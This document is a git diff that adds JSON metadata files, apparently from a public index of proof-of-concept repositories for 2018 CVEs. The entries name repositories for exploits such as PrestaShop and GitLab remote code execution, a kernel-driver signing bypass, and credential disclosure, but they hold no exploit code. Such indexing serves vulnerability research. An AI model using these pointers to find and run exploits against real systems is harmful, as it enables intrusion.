+[ + { + "id": 159935158, + "name": "PrestaShop-CVE-2018-19126", + "full_name": "farisv\/PrestaShop-CVE-2018-19126", + "owner": { + "login": "farisv", + "id": 44131180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44131180?v=4", + "html_url": "https:\/\/github.com\/farisv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farisv\/PrestaShop-CVE-2018-19126", + "description": "PrestaShop (1.6.x <= 1.6.1.23 or 1.7.x <= 1.7.4.4) Back Office Remote Code Execution (CVE-2018-19126)", + "fork": false, + "created_at": "2018-12-01T10:53:45Z", + "updated_at": "2024-08-12T19:43:41Z", + "pushed_at": "2018-12-12T22:11:45Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "prestashop", + "web-security" + ], + "visibility": "public", + "forks": 10, + "watchers": 40, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19127.json b/2018/CVE-2018-19127.json new file mode 100644 index 0000000000..2109b56fbe --- /dev/null +++ b/2018/CVE-2018-19127.json @@ -0,0 +1,33 @@ +[ + { + "id": 156842411, + "name": "phpcms-2008-CVE-2018-19127", + "full_name": "ab1gale\/phpcms-2008-CVE-2018-19127", + "owner": { + "login": "ab1gale", + "id": 5143253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5143253?v=4", + "html_url": "https:\/\/github.com\/ab1gale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ab1gale\/phpcms-2008-CVE-2018-19127", + "description": null, + "fork": false, + "created_at": "2018-11-09T09:51:26Z", + "updated_at": "2021-12-21T15:30:52Z", + "pushed_at": "2018-11-09T09:55:35Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 41, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19131.json b/2018/CVE-2018-19131.json new file mode 100644 index 0000000000..50b3028641 --- /dev/null +++ b/2018/CVE-2018-19131.json @@ -0,0 +1,43 @@ +[ + { + "id": 157386452, + "name": "CVE-2018-19131", + "full_name": "JonathanWilbur\/CVE-2018-19131", + "owner": { + "login": "JonathanWilbur", + "id": 20342114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20342114?v=4", + "html_url": "https:\/\/github.com\/JonathanWilbur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonathanWilbur\/CVE-2018-19131", + "description": "Proof-of-Concept exploit of CVE-2018-19131: Squid Proxy XSS via X.509 Certificate", + "fork": false, + "created_at": "2018-11-13T13:40:10Z", + "updated_at": "2023-05-10T22:24:13Z", + "pushed_at": "2018-11-14T02:40:24Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "proxy", + "squid", + "squid-proxy", + "squid3", + "xss", + "xss-exploitation", + "xss-poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19207.json b/2018/CVE-2018-19207.json new file mode 100644 index 0000000000..3a867d374f --- /dev/null +++ b/2018/CVE-2018-19207.json @@ -0,0 +1,64 @@ +[ + { + "id": 159347902, + "name": "WP-GDPR-Compliance-Plugin-Exploit", + "full_name": "aeroot\/WP-GDPR-Compliance-Plugin-Exploit", + "owner": { + "login": "aeroot", + "id": 281911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/281911?v=4", + "html_url": "https:\/\/github.com\/aeroot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeroot\/WP-GDPR-Compliance-Plugin-Exploit", + "description": "Exploit of the privilege escalation vulnerability of the WordPress plugin \"WP GDPR Compliance\" by \"Van Ons\" (https:\/\/de.wordpress.org\/plugins\/wp-gdpr-compliance\/) CVE-2018-19207", + "fork": false, + "created_at": "2018-11-27T14:27:06Z", + "updated_at": "2021-09-03T13:25:23Z", + "pushed_at": "2018-11-27T14:51:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 175869819, + "name": "cve-2018-19207", + "full_name": "cved-sources\/cve-2018-19207", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2018-19207", + "description": "cve-2018-19207", + "fork": false, + "created_at": "2019-03-15T18:09:58Z", + "updated_at": "2021-04-15T22:51:59Z", + "pushed_at": "2021-04-15T22:51:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19246.json b/2018/CVE-2018-19246.json new file mode 100644 index 0000000000..acc8b9a7a5 --- /dev/null +++ b/2018/CVE-2018-19246.json @@ -0,0 +1,33 @@ +[ + { + "id": 515985803, + "name": "CVE-2018-19246", + "full_name": "NeoWans\/CVE-2018-19246", + "owner": { + "login": "NeoWans", + "id": 93469606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93469606?v=4", + "html_url": "https:\/\/github.com\/NeoWans", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeoWans\/CVE-2018-19246", + "description": null, + "fork": false, + "created_at": "2022-07-20T13:06:26Z", + "updated_at": "2022-07-20T13:11:38Z", + "pushed_at": "2022-07-20T17:42:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19276.json b/2018/CVE-2018-19276.json new file mode 100644 index 0000000000..aa98acb87b --- /dev/null +++ b/2018/CVE-2018-19276.json @@ -0,0 +1,36 @@ +[ + { + "id": 175086551, + "name": "CVE-2018-19276", + "full_name": "mpgn\/CVE-2018-19276", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2018-19276", + "description": "CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE", + "fork": false, + "created_at": "2019-03-11T21:28:55Z", + "updated_at": "2024-08-12T19:46:37Z", + "pushed_at": "2019-03-11T21:35:31Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "openmrs", + "rce" + ], + "visibility": "public", + "forks": 6, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-1932.json b/2018/CVE-2018-1932.json new file mode 100644 index 0000000000..ddddfaf692 --- /dev/null +++ b/2018/CVE-2018-1932.json @@ -0,0 +1,33 @@ +[ + { + "id": 529369757, + "name": "CVE-2018-1932X", + "full_name": "BKreisel\/CVE-2018-1932X", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2018-1932X", + "description": "Rust POC for CVE-2018-1932X kernel driver vulnerabilities", + "fork": false, + "created_at": "2022-08-26T18:42:13Z", + "updated_at": "2022-10-08T22:30:33Z", + "pushed_at": "2022-08-26T19:09:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19320.json b/2018/CVE-2018-19320.json new file mode 100644 index 0000000000..6f7b07ce29 --- /dev/null +++ b/2018/CVE-2018-19320.json @@ -0,0 +1,95 @@ +[ + { + "id": 255308213, + "name": "CVE-2018-19320", + "full_name": "ASkyeye\/CVE-2018-19320", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2018-19320", + "description": "Exploiting ring0 memcpy-like functionality to disable Driver Signing Enforcement (DSE)", + "fork": false, + "created_at": "2020-04-13T11:34:24Z", + "updated_at": "2024-11-03T04:07:00Z", + "pushed_at": "2020-04-12T21:11:16Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 398011552, + "name": "CVE-2018-19320-LPE", + "full_name": "hmnthabit\/CVE-2018-19320-LPE", + "owner": { + "login": "hmnthabit", + "id": 35005725, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35005725?v=4", + "html_url": "https:\/\/github.com\/hmnthabit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hmnthabit\/CVE-2018-19320-LPE", + "description": "CVE-2018-19320 LPE Exploit", + "fork": false, + "created_at": "2021-08-19T16:43:52Z", + "updated_at": "2024-09-29T11:50:56Z", + "pushed_at": "2023-06-19T21:47:37Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 565032751, + "name": "GDRVLoader", + "full_name": "zer0condition\/GDRVLoader", + "owner": { + "login": "zer0condition", + "id": 70964202, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70964202?v=4", + "html_url": "https:\/\/github.com\/zer0condition", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0condition\/GDRVLoader", + "description": "Unsigned driver loader using CVE-2018-19320", + "fork": false, + "created_at": "2022-11-12T05:48:13Z", + "updated_at": "2024-11-27T12:23:01Z", + "pushed_at": "2023-04-09T13:50:29Z", + "stargazers_count": 206, + "watchers_count": 206, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 206, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19321.json b/2018/CVE-2018-19321.json new file mode 100644 index 0000000000..29930bc507 --- /dev/null +++ b/2018/CVE-2018-19321.json @@ -0,0 +1,64 @@ +[ + { + "id": 485863885, + "name": "Driver-RW", + "full_name": "nanabingies\/Driver-RW", + "owner": { + "login": "nanabingies", + "id": 13157335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13157335?v=4", + "html_url": "https:\/\/github.com\/nanabingies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanabingies\/Driver-RW", + "description": "Page Table Manipulation -- CVE-2018-19321", + "fork": false, + "created_at": "2022-04-26T16:25:06Z", + "updated_at": "2024-09-17T02:19:00Z", + "pushed_at": "2023-02-15T13:34:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586124456, + "name": "CVE-2018-19321", + "full_name": "nanabingies\/CVE-2018-19321", + "owner": { + "login": "nanabingies", + "id": 13157335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13157335?v=4", + "html_url": "https:\/\/github.com\/nanabingies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanabingies\/CVE-2018-19321", + "description": "CVE-2018-19321", + "fork": false, + "created_at": "2023-01-07T02:45:30Z", + "updated_at": "2023-04-26T17:02:56Z", + "pushed_at": "2023-01-07T02:46:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19410.json b/2018/CVE-2018-19410.json new file mode 100644 index 0000000000..9ea8eafb60 --- /dev/null +++ b/2018/CVE-2018-19410.json @@ -0,0 +1,33 @@ +[ + { + "id": 748056945, + "name": "CVE-2018-19410-POC", + "full_name": "himash\/CVE-2018-19410-POC", + "owner": { + "login": "himash", + "id": 14277534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14277534?v=4", + "html_url": "https:\/\/github.com\/himash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/himash\/CVE-2018-19410-POC", + "description": "Proof of concept for the vulnerability CVE-2018-19410", + "fork": false, + "created_at": "2024-01-25T07:20:19Z", + "updated_at": "2024-08-29T06:32:44Z", + "pushed_at": "2024-01-25T07:43:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19422.json b/2018/CVE-2018-19422.json new file mode 100644 index 0000000000..905156e7e8 --- /dev/null +++ b/2018/CVE-2018-19422.json @@ -0,0 +1,64 @@ +[ + { + "id": 376677801, + "name": "CVE-2018-19422-SubrionCMS-RCE", + "full_name": "hev0x\/CVE-2018-19422-SubrionCMS-RCE", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2018-19422-SubrionCMS-RCE", + "description": "CVE-2018-19422 Authenticated Remote Code Execution", + "fork": false, + "created_at": "2021-06-14T01:50:21Z", + "updated_at": "2024-10-29T14:01:45Z", + "pushed_at": "2021-06-14T02:03:45Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 487055738, + "name": "SubrionCMS-4.2.1-File-upload-RCE-auth-", + "full_name": "Swammers8\/SubrionCMS-4.2.1-File-upload-RCE-auth-", + "owner": { + "login": "Swammers8", + "id": 51183967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51183967?v=4", + "html_url": "https:\/\/github.com\/Swammers8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Swammers8\/SubrionCMS-4.2.1-File-upload-RCE-auth-", + "description": "This is an edited version of the CVE-2018-19422 exploit to fix an small but annoying issue I had.", + "fork": false, + "created_at": "2022-04-29T17:23:23Z", + "updated_at": "2024-09-20T23:15:33Z", + "pushed_at": "2022-04-29T17:27:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19466.json b/2018/CVE-2018-19466.json new file mode 100644 index 0000000000..ba6273b02e --- /dev/null +++ b/2018/CVE-2018-19466.json @@ -0,0 +1,43 @@ +[ + { + "id": 158910292, + "name": "lempo", + "full_name": "MauroEldritch\/lempo", + "owner": { + "login": "MauroEldritch", + "id": 1292978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1292978?v=4", + "html_url": "https:\/\/github.com\/MauroEldritch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MauroEldritch\/lempo", + "description": "LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018", + "fork": false, + "created_at": "2018-11-24T06:48:34Z", + "updated_at": "2022-05-03T22:15:57Z", + "pushed_at": "2020-05-12T15:34:51Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "argentina", + "authentication", + "cve-2018-19466", + "docker", + "exploit", + "portainer", + "ruby", + "rusia", + "siberia" + ], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19487.json b/2018/CVE-2018-19487.json new file mode 100644 index 0000000000..87bb869757 --- /dev/null +++ b/2018/CVE-2018-19487.json @@ -0,0 +1,33 @@ +[ + { + "id": 160362808, + "name": "wp-jobhunt-exploit", + "full_name": "YOLOP0wn\/wp-jobhunt-exploit", + "owner": { + "login": "YOLOP0wn", + "id": 11887598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11887598?v=4", + "html_url": "https:\/\/github.com\/YOLOP0wn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YOLOP0wn\/wp-jobhunt-exploit", + "description": "CVE-2018-19487, CVE-2018-19488, exploit for WordPress wp-jobhunt plugin", + "fork": false, + "created_at": "2018-12-04T13:36:13Z", + "updated_at": "2024-08-12T19:43:46Z", + "pushed_at": "2019-03-29T09:15:08Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19518.json b/2018/CVE-2018-19518.json new file mode 100644 index 0000000000..77cc0f1976 --- /dev/null +++ b/2018/CVE-2018-19518.json @@ -0,0 +1,64 @@ +[ + { + "id": 163683497, + "name": "CVE-2018-19518", + "full_name": "ensimag-security\/CVE-2018-19518", + "owner": { + "login": "ensimag-security", + "id": 44459067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44459067?v=4", + "html_url": "https:\/\/github.com\/ensimag-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ensimag-security\/CVE-2018-19518", + "description": "some works on CVE-2018-19518 ", + "fork": false, + "created_at": "2018-12-31T16:36:49Z", + "updated_at": "2020-09-10T01:55:49Z", + "pushed_at": "2019-01-14T09:48:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 628224297, + "name": "EXP_CVE-2018-19518", + "full_name": "houqe\/EXP_CVE-2018-19518", + "owner": { + "login": "houqe", + "id": 44364208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44364208?v=4", + "html_url": "https:\/\/github.com\/houqe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/houqe\/EXP_CVE-2018-19518", + "description": null, + "fork": false, + "created_at": "2023-04-15T09:31:45Z", + "updated_at": "2023-11-16T14:18:20Z", + "pushed_at": "2023-04-15T09:33:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19537.json b/2018/CVE-2018-19537.json new file mode 100644 index 0000000000..8d903ad2c0 --- /dev/null +++ b/2018/CVE-2018-19537.json @@ -0,0 +1,42 @@ +[ + { + "id": 159082952, + "name": "TP-Link-ArcherC5-RCE", + "full_name": "JackDoan\/TP-Link-ArcherC5-RCE", + "owner": { + "login": "JackDoan", + "id": 1024837, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1024837?v=4", + "html_url": "https:\/\/github.com\/JackDoan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JackDoan\/TP-Link-ArcherC5-RCE", + "description": "CVE-2018-19537", + "fork": false, + "created_at": "2018-11-25T23:03:19Z", + "updated_at": "2024-02-28T07:59:32Z", + "pushed_at": "2018-11-26T22:39:08Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2018-19537", + "cwe-77", + "injection", + "router", + "tp-link", + "vulnerability", + "web-gui" + ], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19571.json b/2018/CVE-2018-19571.json new file mode 100644 index 0000000000..9139356538 --- /dev/null +++ b/2018/CVE-2018-19571.json @@ -0,0 +1,105 @@ +[ + { + "id": 336995518, + "name": "edb-49263-fixed", + "full_name": "xenophil90\/edb-49263-fixed", + "owner": { + "login": "xenophil90", + "id": 67900150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67900150?v=4", + "html_url": "https:\/\/github.com\/xenophil90", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xenophil90\/edb-49263-fixed", + "description": "Fixed version of the Python script to exploit CVE-2018-19571 and CVE-2018-19585 (GitLab 11.4.7 - Authenticated Remote Code Execution) that is available at https:\/\/www.exploit-db.com\/exploits\/49263 (Python 3.9).", + "fork": false, + "created_at": "2021-02-08T07:38:09Z", + "updated_at": "2021-02-08T08:51:49Z", + "pushed_at": "2021-02-08T08:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "gitlab", + "python39", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 356847908, + "name": "gitlab-RCE-11.4.7", + "full_name": "Algafix\/gitlab-RCE-11.4.7", + "owner": { + "login": "Algafix", + "id": 26028451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26028451?v=4", + "html_url": "https:\/\/github.com\/Algafix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Algafix\/gitlab-RCE-11.4.7", + "description": "GitLab 11.4.7 RCE exploit with different reverse shells. CVE-2018-19571 + CVE-2018-19585", + "fork": false, + "created_at": "2021-04-11T11:23:37Z", + "updated_at": "2022-12-05T21:20:21Z", + "pushed_at": "2021-05-03T12:59:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-19571", + "cve-2018-19585", + "exploit", + "gitlab" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 428672278, + "name": "gitlab-ssrf", + "full_name": "CS4239-U6\/gitlab-ssrf", + "owner": { + "login": "CS4239-U6", + "id": 93301106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93301106?v=4", + "html_url": "https:\/\/github.com\/CS4239-U6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CS4239-U6\/gitlab-ssrf", + "description": "Demonstration of CVE-2018-19571: GitLab SSRF CVE", + "fork": false, + "created_at": "2021-11-16T13:45:06Z", + "updated_at": "2021-11-17T14:20:16Z", + "pushed_at": "2021-11-17T14:20:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19592.json b/2018/CVE-2018-19592.json new file mode 100644 index 0000000000..7b02fc57d2 --- /dev/null +++ b/2018/CVE-2018-19592.json @@ -0,0 +1,33 @@ +[ + { + "id": 158343993, + "name": "CVE-2018-19592", + "full_name": "BradyDonovan\/CVE-2018-19592", + "owner": { + "login": "BradyDonovan", + "id": 18465062, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18465062?v=4", + "html_url": "https:\/\/github.com\/BradyDonovan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BradyDonovan\/CVE-2018-19592", + "description": null, + "fork": false, + "created_at": "2018-11-20T06:51:16Z", + "updated_at": "2019-09-27T00:20:36Z", + "pushed_at": "2019-09-27T00:20:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19788.json b/2018/CVE-2018-19788.json new file mode 100644 index 0000000000..56ec652c86 --- /dev/null +++ b/2018/CVE-2018-19788.json @@ -0,0 +1,134 @@ +[ + { + "id": 160750436, + "name": "CVE-2018-19788", + "full_name": "AbsoZed\/CVE-2018-19788", + "owner": { + "login": "AbsoZed", + "id": 17788335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17788335?v=4", + "html_url": "https:\/\/github.com\/AbsoZed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbsoZed\/CVE-2018-19788", + "description": "Silly easy exploit for CVE-2018-19788", + "fork": false, + "created_at": "2018-12-07T00:42:35Z", + "updated_at": "2022-07-14T03:08:46Z", + "pushed_at": "2018-12-07T00:56:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 160872186, + "name": "CVE-2018-19788", + "full_name": "d4gh0s7\/CVE-2018-19788", + "owner": { + "login": "d4gh0s7", + "id": 29960687, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29960687?v=4", + "html_url": "https:\/\/github.com\/d4gh0s7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4gh0s7\/CVE-2018-19788", + "description": "Ansible role to check the vulnerability tracked as CVE-2018-19788, impacts PolicyKit version 0.115 which comes pre-installed on a wide range of Linux distributions", + "fork": false, + "created_at": "2018-12-07T20:27:01Z", + "updated_at": "2019-12-17T20:34:48Z", + "pushed_at": "2018-12-10T15:57:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ansible", + "ansible-role", + "cve-2018-19788", + "exploit", + "poc", + "security", + "security-audit" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 162179568, + "name": "PoC", + "full_name": "Ekultek\/PoC", + "owner": { + "login": "Ekultek", + "id": 14183473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14183473?v=4", + "html_url": "https:\/\/github.com\/Ekultek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ekultek\/PoC", + "description": "Leveraging CVE-2018-19788 without root shells", + "fork": false, + "created_at": "2018-12-17T19:26:22Z", + "updated_at": "2023-12-21T18:36:52Z", + "pushed_at": "2018-12-18T19:11:25Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 163684618, + "name": "CVE-2018-19788", + "full_name": "jhlongjr\/CVE-2018-19788", + "owner": { + "login": "jhlongjr", + "id": 39674727, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39674727?v=4", + "html_url": "https:\/\/github.com\/jhlongjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhlongjr\/CVE-2018-19788", + "description": "Exploiting The CVE-2018-19788 PolicyKit Bug", + "fork": false, + "created_at": "2018-12-31T16:54:58Z", + "updated_at": "2020-08-27T02:29:39Z", + "pushed_at": "2018-12-31T17:12:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 